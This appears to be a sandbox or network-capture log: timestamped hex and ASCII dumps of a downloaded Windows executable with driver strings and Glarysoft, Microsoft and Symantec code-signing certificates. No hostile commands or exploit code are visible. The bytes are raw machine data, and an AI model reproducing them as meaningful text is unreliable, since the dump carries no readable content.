                                                                                                                                                                                2021-10-19 05:23:31 UTC3035INData Raw: e6 01 82 dd 16 9d 05 68 62 7f 7a 20 af f7 21 4c c2 13 2c 71 14 e0 62 16 f7 d2 0d 46 33 15 2a ea 29 d9 2a ae 21 86 6d 48 39 1a 2d b6 f4 0c 40 59 d7 ef b9 c0 1c dc 91 8e 5e 21 00 a3 b8 e6 03 c9 d2 6b e8 c2 47 d5 b7 5b 7c ac 18 a7 6e ca 8f 30 9e f6 59 68 ec 89 49 a8 7c 81 c0 6a 4c 75 02 4d 5e 65 0b ec e5 80 e4 b2 3f 6f 7e 00 76 4a 3d b7 3b af 48 14 7d 66 38 f5 ba 80 21 88 69 dc e4 5e 39 00 a1 33 46 22 a9 aa 8f 41 1d 51 84 03 87 be 85 2d 50 d9 5e 99 b0 3d f0 42 00 d4 93 b4 8e 17 0e b3 37 4d ce 42 c0 db 9d 2c a9 00 a0 70 33 7b a7 8a 13 18 00 80 ef 6d 63 5d 01 fc b3 03 dd c0 f3 e7 0e 23 a0 4e 47 cc 2e fe 7c ae 0e 16 e6 a0 46 86 65 78 d5 00 83 ef 8f b5 19 08 b1 12 00 40 3a 6f 94 25 10 ce 50 00 3c 4c e7 80 5b 46 64 ca 00 4f 17 e2 d6 b7 5e ab d9 3d 04 26 03 a5 cd
                                                                                                                                                                                Data Ascii: hbz !L,qbF3*)*!mH9-@Y^!kG[|n0YhI|jLuM^e?o~vJ=;H}f8!i^93F"AQ-P^=B7MB,p3{mc]#NG.|Fex@:o%P<L[FdO^=&
                                                                                                                                                                                2021-10-19 05:23:31 UTC3051INData Raw: 71 03 1b 32 ef e7 d5 b7 00 a5 da 73 19 3d a1 38 89 0e 76 01 5e 07 81 b5 8c ea a2 f7 c8 55 0a f0 00 d3 f7 da 06 ed a1 28 ca 07 dc 98 54 15 68 70 94 58 cc 25 ec fe 00 fd b6 ec e3 ba f8 93 75 00 ed 15 94 45 ae 1e 49 f0 14 ee 01 4e a6 24 ac 5e 0f b1 66 c0 47 53 60 5a 10 f6 a7 48 16 8a 00 8f 41 9d ca e8 c4 d4 00 6d 44 4d 72 3a 98 3e 01 00 ee 61 bc 2d 25 6b 8f 0b f8 e7 00 1f ac 1b 10 11 5f 2c 12 4e 78 82 11 ea c0 ec e5 d5 2d 96 40 e6 ed bd 51 db e2 17 14 30 1b 36 f4 7c f0 2b 03 e6 ce 52 61 fa 79 88 38 44 f5 13 8b 9f 55 00 31 68 6a aa 8e c3 3e 77 af 80 2f b9 bf 79 76 ee 75 00 47 29 e4 8d db b1 02 11 00 96 33 d2 a8 6c f4 26 49 1f 34 2c 7f c1 65 07 f9 4b 73 cf c3 09 a9 69 a2 c4 7e 14 00 62 3a c8 bf b8 36 b6 c1 7b b4 00 16 08 46 0b a2 fc 41 d9 00 d6 47 ca 32 f9 27
                                                                                                                                                                                Data Ascii: q2s=8v^U(ThpX%uEIN$^fGS`ZHAmDMr:>a-%k_,Nx-@Q06|+Ray8DU1hj>w/yvuG)3l&I4,eKsi~b:6{FAG2'
                                                                                                                                                                                2021-10-19 05:23:31 UTC3059INData Raw: 81 c9 8b c0 9f 7f 00 38 40 e2 34 92 4a 09 af c1 ed a9 74 fb fb c1 b3 01 4b 54 b8 7c 25 fe 43 24 d0 f0 05 d9 0a 1a df 7d 2d 45 00 03 18 58 e9 06 39 c0 bc e4 d5 bb 94 5f 01 cb 97 70 2c 10 ef 7f 20 9c f7 bf 45 20 1d 7a f5 38 d3 75 c1 d1 d4 0f 28 41 c5 8b bd bb 1f 21 c2 52 fb d8 d0 57 d9 7a 46 83 28 b7 f4 c6 78 ef 37 80 54 39 5b fa be 75 b5 ba e2 87 8a 76 dc 92 54 ec dc b8 09 bd fb c6 c2 9d 8d 30 d6 ac 4e fd a2 e0 87 d4 97 bf 88 31 bf 2d fc de 5e 5b 46 78 96 05 06 e9 87 54 c2 ff fc fd 14 ec ec 5d f7 f1 68 3c 20 c5 51 55 dd dc 3e c5 d3 fe b2 de d3 ee 9c 3d 51 95 a0 80 68 1c 2d 4f e1 2a ec 1b a5 aa 23 f8 d6 91 b7 4b 2a 40 56 b8 0c 3c 55 14 b5 fe 6b 78 68 96 1e 8f bb 2b 13 3c eb d8 b0 50 11 b7 41 02 f4 be b2 23 e5 94 96 eb f8 14 fd 3b 9e 72 59 b5 c5 f9 5f bb 8a
                                                                                                                                                                                Data Ascii: 8@4JtKT|%C$}-EX9_p, E z8u(A!RWzF(x7T9[uvT0N1-^[FxT]h< QU>=Qh-O*#K*@V<Ukxh+<PA#;rY_
                                                                                                                                                                                2021-10-19 05:23:31 UTC3075INData Raw: 00 bc 1e 00 00 30 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8e c4 2c 5b 00 00 00 00 02 00 00 00 6b 00 00 00 00 1a 00 00 00 1a 00 00 00 00 00 00 5c 00 44 00 6f 00 73 00 44 00 65 00 76 00 69 00 63 00 65 00 73 00 5c 00 42 00 4f 00 4f 00 54 00 53 00 54 00 41 00 52 00 54 00 55 00 50 00 5f 00 44 00 65 00 76 00 69 00 63 00 65 00 4e 00 61 00 6d 00 65 00 00 00 00 00 5c 00 44 00 65 00 76 00 69 00 63 00 65 00 5c 00 42 00 4f 00 4f 00 54 00 53 00 54 00 41 00 52 00 54 00 55 00 50 00 5f 00 44 00 65 00 76 00 69 00 63 00 65 00 4e 00 61 00 6d 00 65 00 00 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 1c 01 00 70 1a 01 00 02 00
                                                                                                                                                                                Data Ascii: 0 ,[k\DosDevices\BOOTSTARTUP_DeviceName\Device\BOOTSTARTUP_DeviceNameHp
                                                                                                                                                                                2021-10-19 05:23:31 UTC3091INData Raw: 74 69 6f 6e 20 41 75 74 68 6f 72 69 74 79 30 1e 17 0d 31 36 30 31 31 32 30 30 30 30 30 30 5a 17 0d 33 31 30 31 31 31 32 33 35 39 35 39 5a 30 77 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 1d 30 1b 06 03 55 04 0a 13 14 53 79 6d 61 6e 74 65 63 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 1f 30 1d 06 03 55 04 0b 13 16 53 79 6d 61 6e 74 65 63 20 54 72 75 73 74 20 4e 65 74 77 6f 72 6b 31 28 30 26 06 03 55 04 03 13 1f 53 79 6d 61 6e 74 65 63 20 53 48 41 32 35 36 20 54 69 6d 65 53 74 61 6d 70 69 6e 67 20 43 41 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 59 9d 59 55 4f 9d 8c 72 5d 1a 81 a2 eb 55 f3 b0 01 ad 3c 71 ac 32 8f 05 6b 86 9a 27 00 32 97 6a 4d c9 64 14 4b 29 bb c2 d9 29 b9 2e ec 63 b3 e1 cf 3f 0b 56 90 f8
                                                                                                                                                                                Data Ascii: tion Authority0160112000000Z310111235959Z0w10UUS10USymantec Corporation10USymantec Trust Network1(0&USymantec SHA256 TimeStamping CA0"0*H0YYUOr]U<q2k'2jMdK)).c?V
                                                                                                                                                                                2021-10-19 05:23:31 UTC3107INData Raw: c2 bf 2e 50 5a fb 14 c2 76 8e 43 01 25 43 b4 a1 e2 45 f4 e8 b7 7b c3 74 cc 22 d7 b4 94 00 02 f7 4d ed bf b4 b7 44 24 6b cd 5f 45 3b d1 44 ce 43 12 73 17 82 8b 69 b4 2b cb 99 1e ac 72 1b 26 4d 71 1f b1 31 dd fb 51 61 02 53 a6 aa f5 49 2c 05 78 45 a5 2f 89 ce e7 99 e7 fe 8c e2 57 3f 3d c6 92 dc 4a f8 7b 33 e4 79 0a fb f0 75 88 41 9c ff c5 03 51 99 aa d7 6c 9f 93 69 87 65 29 83 85 c2 60 14 c4 c8 c9 3b 14 da c0 81 f0 1f 0d 74 de 92 22 ab ca f7 fb 74 7c 27 e6 f7 4a 1b 7f a7 c3 9e 2d ae 8a ea a6 e6 aa 27 16 7d 61 f7 98 71 11 bc e2 50 a1 4b e5 5d fa e5 0e a7 2c 9f aa 65 20 d3 d8 96 e8 c8 7c a5 4e 48 44 ff 19 e2 44 07 92 0b d7 68 84 80 5d 6a 78 64 45 cd 60 46 7e 54 c1 13 7c c5 79 f1 c9 c1 71 02 03 01 00 01 a3 81 fa 30 81 f7 30 1d 06 03 55 1d 0e 04 16 04 14 5f 9a
                                                                                                                                                                                Data Ascii: .PZvC%CE{t"MD$k_E;DCsi+r&Mq1QaSI,xE/W?=J{3yuAQlie)`;t"t|'J-'}aqPK],e |NHDDh]jxdE`F~T|yq00U_
                                                                                                                                                                                2021-10-19 05:23:31 UTC3123INData Raw: 00 00 00 00 00 00 00 00 00 00 26 00 00 10 3f 00 00 00 24 00 00 78 01 00 00 10 19 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 19 00 00 40 00 00 00 00 00 00 00 00 00 00 00 80 18 00 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 13 00 00 80 04 00 00 00 14 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 14 03 00 00 80 18 00 00 80 03 00 00 80 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 51 00 00 00 00 1c 00 00 80 00 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 49 4e 49 54 00 00 00 00 bc 03 00 00 80 1c 00 00 00 04 00 00 80 1c 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii: &?$x@.text h.rdata@H.dataQ@INIT
                                                                                                                                                                                2021-10-19 05:23:31 UTC3139INData Raw: 32 33 33 35 30 5a 30 23 06 09 2a 86 48 86 f7 0d 01 09 04 31 16 04 14 f4 4a 8b 5b 70 18 1e ab 22 05 4c 96 34 94 72 21 c7 cb 08 d7 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 04 82 01 00 52 c4 e7 ff 85 6b c6 6e 0a e4 4a ae f5 56 c9 ba 61 8f ce d0 de 1a 44 cd d1 e3 b8 30 19 44 cb 7d 00 1d 3a 44 ca 91 fc c5 66 9f b0 1b e3 30 4d b4 73 b3 62 6b 17 29 79 d7 f2 28 64 d1 fd e2 10 c0 9c f3 e5 be 65 8b 89 e8 04 12 5c a0 91 cb 77 cd eb 33 f6 87 ec a8 56 18 97 ce fb 93 b5 ad 13 69 ff 6b 89 61 38 06 f1 01 cb 62 7f e1 2c e1 8f fe 01 41 5a 32 35 cd 64 48 f9 7d 78 9e d5 8f eb b2 20 8a 82 30 51 4d 51 9c a0 ac 4c d2 75 b0 2a d1 b2 81 16 81 5a e3 41 d5 4d 32 72 5a 13 5a fe 4d ae ce 67 31 62 9c 3c 29 48 36 40 a8 73 28 5d ce 30 60 7e 4e 60 5e 24 a3 a6 12 b5 0c 53 ea 6a bc b3
                                                                                                                                                                                Data Ascii: 23350Z0#*H1J[p"L4r!0*HRknJVaD0D}:Df0Msbk)y(de\w3Vika8b,AZ25dH}x 0QMQLu*ZAM2rZZMg1b<)H6@s(]0`~N`^$Sj
                                                                                                                                                                                2021-10-19 05:23:31 UTC3155INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 61 00 00 00 00 00 00 98 61 00 00 00 00 00 00 ac 61 00 00 00 00 00 00 c0 61 00 00 00 00 00 00 de 61 00 00 00 00 00 00 f6 61 00 00 00 00 00 00 12 62 00 00 00 00 00 00 22 62 00 00 00 00 00 00 3c 62 00 00 00 00 00 00 4c 62 00 00 00 00 00 00 56 62 00 00 00 00 00 00 66 62 00 00 00 00 00 00 7a 62 00 00 00 00 00 00 92 62 00 00 00 00 00 00 aa 62 00 00 00 00 00 00 c2 62 00 00 00 00 00 00 d4 62 00 00 00 00 00 00 f6 62 00 00 00 00 00 00 08 63 00 00 00 00 00 00 1c 63 00 00 00 00 00 00 32 63 00 00 00 00 00 00 4a 63 00 00 00 00 00 00 62 63 00 00 00 00 00 00 74 63 00 00 00 00 00 00 92 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a c4 2c 5b 00 00 00 00 02 00
                                                                                                                                                                                Data Ascii: aaaaaab"b<bLbVbfbzbbbbbbcc2cJcbctcc*,[
                                                                                                                                                                                2021-10-19 05:23:31 UTC3171INData Raw: 0e 04 16 04 14 7f d3 65 a7 c2 dd ec bb f0 30 09 f3 43 39 fa 02 af 33 31 33 30 1f 06 03 55 1d 23 04 18 30 16 80 14 62 fb 0a 21 5b 7f 43 6e 11 da 09 54 50 6b f5 d2 96 71 f1 9e 30 55 06 03 55 1d 1f 04 4e 30 4c 30 4a a0 48 a0 46 86 44 68 74 74 70 3a 2f 2f 63 72 6c 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 70 6b 69 2f 63 72 6c 2f 70 72 6f 64 75 63 74 73 2f 4d 69 63 72 6f 73 6f 66 74 43 6f 64 65 56 65 72 69 66 52 6f 6f 74 2e 63 72 6c 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 82 02 01 00 81 2a 82 16 8c 34 67 2b e5 03 eb 34 7b 8c a2 a3 50 8a f4 55 86 f1 1e 8c 8e ae 7d ee 03 19 ce 72 95 18 48 ad 62 11 fd 20 fd 3f 47 06 01 5a e2 e0 6f 8c 15 2c 4e 3c 6a 50 6c 0b 36 a3 cf 7a 0d 9c 42 bc 5c f8 19 d5 60 e3 69 e6 e2 23 41 67 8c 68 83 76 2b 8f 93 a3 2a b5 7f be
                                                                                                                                                                                Data Ascii: e0C93130U#0b![CnTPkq0UUN0L0JHFDhttp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0*H*4g+4{PU}rHb ?GZo,N<jPl6zB\`i#Aghv+*
                                                                                                                                                                                2021-10-19 05:23:31 UTC3187INData Raw: da f2 18 29 88 5e c0 35 28 7a b3 32 c3 27 38 f5 e2 6c 6d 25 02 b2 f0 44 af b1 e0 48 c8 5c 7c 9b af 76 74 7d e1 4e cd ec a3 c7 48 17 96 a7 41 67 2a 04 7f 89 da fe 2c 12 c0 19 82 a0 26 c4 30 82 07 50 30 82 05 38 a0 03 02 01 02 02 13 33 00 00 00 0d 69 0d 5d 78 93 d0 76 df 00 00 00 00 00 0d 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 81 88 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 32 30 30 06 03 55 04 03 13 29 4d 69 63 72 6f 73 6f 66 74 20 52 6f 6f 74 20 43 65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f 72 69 74 79 20 32 30 31 30 30 1e 17 0d 31
                                                                                                                                                                                Data Ascii: )^5(z2'8lm%DH\|vt}NHAg*,&0P083i]xv0*H010UUS10UWashington10URedmond10UMicrosoft Corporation1200U)Microsoft Root Certificate Authority 201001
                                                                                                                                                                                2021-10-19 05:23:31 UTC3203INData Raw: 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1d 15 08 60 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 09 00 00 1e 00 00 00 10 00 00 00 00 00 00 64 60 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 06 00 01 00 05 00 02 00 00 00 00 00 00 90 00 00 00 04 00 00 09 78 00 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 60 00 00 28 00 00 00 00 70 00 00 80 03 00 00 00 50 00 00 2c 01 00 00 00 32 00 00 00 46 00 00 00 80 00 00 0c 00 00 00 d0 30 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 d0 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii: PEd`"d`x`(pP,2F00
                                                                                                                                                                                2021-10-19 05:23:31 UTC3219INData Raw: 57 69 6e 64 6f 77 73 20 54 68 69 72 64 20 50 61 72 74 79 20 43 6f 6d 70 6f 6e 65 6e 74 20 43 41 20 32 30 31 34 02 13 33 00 00 00 3b cd 6b d8 3b c6 71 b8 fe 00 00 00 00 00 3b 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 a0 81 be 30 19 06 09 2a 86 48 86 f7 0d 01 09 03 31 0c 06 0a 2b 06 01 04 01 82 37 02 01 04 30 1c 06 0a 2b 06 01 04 01 82 37 02 01 0b 31 0e 30 0c 06 0a 2b 06 01 04 01 82 37 02 01 15 30 2f 06 09 2a 86 48 86 f7 0d 01 09 04 31 22 04 20 ad 06 47 55 70 56 cc b1 0a ec 03 61 1e 5b 63 a9 01 5c 34 ce 88 36 42 cf f0 41 a3 e2 d2 39 b2 86 30 52 06 0a 2b 06 01 04 01 82 37 02 01 0c 31 44 30 42 a0 14 80 12 00 47 00 6c 00 61 00 72 00 79 00 73 00 6f 00 66 00 74 a1 2a 80 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 65 6e 2d
                                                                                                                                                                                Data Ascii: Windows Third Party Component CA 20143;k;q;0`He0*H1+70+710+70/*H1" GUpVa[c\46BA90R+71D0BGlarysoft*(https://www.microsoft.com/en-
                                                                                                                                                                                2021-10-19 05:23:31 UTC3235INData Raw: 89 7d fc eb 12 33 c0 40 c3 8b 65 e8 c6 45 e7 00 c7 45 fc fe ff ff ff 8a 45 e7 eb 10 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff 32 c0 e8 e5 0b 00 00 c2 08 00 cc cc cc cc cc 6a 4c 68 f8 1a 01 00 e8 8c 0b 00 00 89 4d e4 ff 15 84 18 01 00 84 c0 0f 85 53 01 00 00 83 65 fc 00 8b 75 14 85 f6 0f 84 3d 01 00 00 56 ff 15 a8 18 01 00 84 c0 0f 84 2e 01 00 00 f6 45 18 01 74 13 8b 45 08 89 46 04 8b 5d 0c 89 1e 8a 45 10 88 46 08 eb 03 8b 5d 0c f6 45 18 06 0f 84 f6 00 00 00 83 65 c4 00 33 c0 8d 7d c8 ab ab ab ab ab c7 45 c4 18 00 00 00 33 c9 89 4d c8 c7 45 d0 00 02 00 00 89 4d cc 89 4d d4 89 4d d8 89 4d dc 33 c0 8d 7d e0 ab 89 5d dc 89 4d 0c 8d 45 dc 50 8d 45 c4 50 68 ff 0f 1f 00 8d 45 0c 50 ff 15 c4 18 01 00 85 c0 0f 85 b0 00 00 00 f6 45 18 02 74 1f 8d 46 20 50 ff 75 0c
                                                                                                                                                                                Data Ascii: }3@eEEE3@eE2jLhMSeu=V.EtEF]EF]Ee3}E3MEMMMM3}]MEPEPhEPEtF Pu
                                                                                                                                                                                2021-10-19 05:23:31 UTC3251INData Raw: 86 48 86 f7 0d 01 01 0b 05 00 04 82 01 00 13 21 3d d3 1b 52 8e 96 91 b9 e2 42 44 23 49 d3 1a ae 3e 27 83 84 82 9a 0f 3b e0 60 b5 d9 88 98 21 45 f0 29 f1 31 42 30 4f b6 15 1f 2b c5 1a 5a 12 e5 04 c4 b9 8c 59 1b d8 8c 51 0b 76 8b 0f 44 57 7c 3b d1 41 f9 15 ac 49 42 75 e7 f4 75 d0 b7 47 55 12 3d 86 30 ce 39 7b a7 b9 11 74 56 16 e2 69 3f 64 ba 48 f3 3b e2 10 20 86 75 96 4d ce 85 cc 4e a5 ce 5e a1 c5 48 9f 75 44 3d 8a fb ab 71 27 df 1c af c0 1e 91 74 4f 8d 90 81 58 e2 fa a7 c9 de 80 f0 fe f1 e3 27 72 a4 5c 39 57 a6 19 9e 2d 36 d9 c3 96 e1 54 10 84 ea f9 81 c7 3c 6d c3 d1 74 46 62 0c 33 b8 8e 3d 9c df 41 ce 33 12 e0 c5 21 fe de 8e 8a cf 4f 13 2b 02 0d 2a 29 ee 09 0d d8 f1 4b 69 6a c6 55 51 be f5 04 cb e6 7b 0c 82 8c 86 a1 f7 fe db ab 6b c6 f5 0f 2d e6 94 cf 04
                                                                                                                                                                                Data Ascii: H!=RBD#I>';`!E)1B0O+ZYQvDW|;AIBuuGU=09{tVi?dH; uMN^HuD=q'tOX'r\9W-6T<mtFb3=A3!O+*)KijUQ{k-
                                                                                                                                                                                2021-10-19 05:23:31 UTC3267INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                2021-10-19 05:23:31 UTC3283INData Raw: 19 06 03 55 04 05 13 12 39 31 31 31 30 31 30 38 36 38 30 34 35 36 31 31 35 45 31 0b 30 09 06 03 55 04 06 13 02 43 4e 31 12 30 10 06 03 55 04 08 0c 09 e5 8c 97 e4 ba ac e5 b8 82 31 16 30 14 06 03 55 04 0a 13 0d 47 6c 61 72 79 73 6f 66 74 20 4c 54 44 31 16 30 14 06 03 55 04 03 13 0d 47 6c 61 72 79 73 6f 66 74 20 4c 54 44 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 a1 aa e3 11 ca af be b5 2c c4 2b 64 af f4 07 fa 81 18 e9 16 a6 a8 3c cc 7c 50 88 ed 24 16 10 3c 3d 0f c1 60 fa 41 a8 a0 e9 27 3e 60 cd b4 8c d0 ab 66 cc e7 0f 28 ea af fa 95 86 0b 20 a4 0f e0 f8 fb 75 b8 9f 4b b7 26 2f 38 cb 28 30 8d 00 a0 93 3d 8f 5b bb d3 14 85 0d 39 1d 40 72 10 84 ee 35 f6 b4 cc 2c 49 eb 5e 87 b7 ba 4e f4 2b b4 bf 06 e8 6b
                                                                                                                                                                                Data Ascii: U91110108680456115E10UCN10U10UGlarysoft LTD10UGlarysoft LTD0"0*H0,+d<|P$<=`A'>`f( uK&/8(0=[9@r5,I^N+k
                                                                                                                                                                                2021-10-19 05:23:31 UTC3299INData Raw: b9 23 f3 4d 56 44 d6 de ac cf d9 71 d9 2d 39 94 9c 94 9c a3 52 0d 69 96 b4 2b d7 30 b7 28 b7 4f 66 2b 2b 93 0d e4 79 e6 6d ca 1b 93 87 ca f7 e4 23 f9 73 f3 db 15 6c 85 4c d1 a3 b4 52 ae 50 0e 16 4c 2f a8 2b 78 5b 18 5b 78 b8 48 bd 48 5a d4 33 df 66 fe ea f9 23 0b 82 16 7c bd 90 b0 50 b8 b0 b3 d8 b8 78 59 f1 e0 22 bf 45 bb 16 23 8b 53 17 77 2e 31 5d 52 ba 64 78 69 f0 d2 7d cb 68 cb b2 96 fd 50 e2 58 52 55 f2 6a 79 dc f2 8e 52 83 d2 a5 a5 43 2b 82 57 34 95 a9 94 c9 cb 6e ae f4 5a b9 63 15 61 95 64 55 ef 6a 97 d5 5b 56 7f 2a 17 95 5f ac 70 ac a8 ae f8 b0 46 b8 e6 e2 57 4e 5f d5 7c f5 79 6d da da de 4a b7 ca ed eb 48 eb a4 eb 6e ac f7 59 bf af 4a bd 6a 41 d5 d0 86 f0 0d ad 1b f1 8d e5 1b 5f 6d 4a de 74 a1 7a 6a f5 8e cd b4 cd ca cd 03 35 61 35 ed 5b cc b6 ac
                                                                                                                                                                                Data Ascii: #MVDq-9Ri+0(Of++ym#slLRPL/+x[[xHHZ3f#|PxY"E#Sw.1]Rdxi}hPXRUjyRC+W4nZcadUj[V*_pFWN_|ymJHnYJjA_mJtzj5a5[
                                                                                                                                                                                2021-10-19 05:23:31 UTC3315INData Raw: fd 33 e6 0a 19 30 2b 38 57 88 18 03 e7 cf 66 f9 51 37 72 1b ac a8 1c 1b 62 94 de 9f cd 72 1a de 9f 8a ce b1 21 46 e9 fd 33 e6 0a a5 fd ad 65 39 7b 2b 2a c7 86 18 a5 f7 cf 15 5c 15 c0 93 00 c6 02 18 0f e0 52 00 1b 73 80 0b 69 34 31 4a e8 9f 29 b8 a7 01 78 04 c0 68 00 b7 01 68 4b be df 08 60 1e 80 99 c9 d3 ee 62 66 3c 31 06 c0 3f 53 96 df 3c e4 ce 15 da 02 e0 6a 24 72 85 0a 15 31 06 c0 3f d3 9e 6b 34 61 49 2d 62 50 88 31 00 fe 94 2b 54 c6 a2 05 72 14 5c 12 05 97 44 c1 25 51 70 49 14 5c 12 05 97 82 4b a2 e0 92 28 b8 a4 93 2b ca f2 1b 44 8c 93 b1 e7 52 06 de 20 61 08 01 45 10 02 0a 65 f9 95 29 c3 fc 8a 60 a0 0c bc 93 ce 28 49 45 30 50 06 de 60 61 98 5f 11 2c ed 3d b3 67 24 31 8c ed b5 0d 30 bb 22 18 28 03 ef a4 30 4c ab 08 86 67 f5 7c 33 cb 32 69 11 80 55 39
                                                                                                                                                                                Data Ascii: 30+8WfQ7rbr!F3e9{+*\Rsi41J)xhhK`bf<1?S<j$r1?k4aI-bP1+Tr\D%QpI\K(+DR aEe)`(IE0P`a_,=g$10"(0Lg|32iU9
                                                                                                                                                                                2021-10-19 05:23:31 UTC3331INData Raw: f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 a0 a0 68 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 9f 9f 66 f0 f0 f0 a6 a3 a2 18 12 54 20 1a 6f 00 96 96 00 d1 d1 00 91 91 20 1a 6f 2c 14 74 27 10 6b 2c 14 74 27 10 6b 2c 14 74 27 10 6b 18 12 54 f0 f0 f0 f0 f0 f0 99 f0 df 98 f0 de 1e f3 c9 1e f3 c9 1e f3 c9 1e f3 c9 1e f3 c9 1e f3 c9 1e f3 c9 1e f3 c9 1e f3 c9 1e f3 c9 1e f3 c9 1e f3 c9 99 f0 df eb ef ee f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 f0 59 58 5c 75 74 74 75 74 74 75 74 74 75 74 74 75 74 74 75 74 74 75 74 74 75 74 74 75 74 74 75 74 74 75 74 74 75 74
                                                                                                                                                                                Data Ascii: h::::::::::::::::::::::::::::::::::::fT o o,t'k,t'k,t'kTYX\uttuttuttuttuttuttuttuttuttuttuttut
                                                                                                                                                                                2021-10-19 05:23:31 UTC3347INData Raw: 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 64 65 70 65 6e 64 65 6e 63 79 3e 3c 64 65 70 65 6e 64 65 6e 74 41 73 73 65 6d 62 6c 79 3e 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 74 79 70 65 3d 22 77 69 6e 33 32 22 20 6e 61 6d 65 3d 22 4d 69 63 72 6f 73 6f 66 74 2e 57 69 6e 64 6f 77 73 2e 43 6f 6d 6d 6f 6e 2d 43 6f 6e 74 72 6f 6c 73 22 20 76 65 72 73 69 6f 6e 3d 22 36 2e 30 2e 30 2e 30 22 20 70 72 6f 63 65 73 73 6f 72 41 72 63 68 69 74 65 63 74 75 72 65 3d 22 41 4d 44 36 34 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 36 35 39 35 62 36 34 31 34 34 63 63 66 31 64 66 22 20 6c 61 6e 67 75 61 67 65 3d 22 2a 22 3e 3c 2f 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 3e 3c 2f 64 65 70 65 6e 64 65 6e 74 41 73 73 65 6d 62 6c 79 3e 3c 2f 64 65 70 65
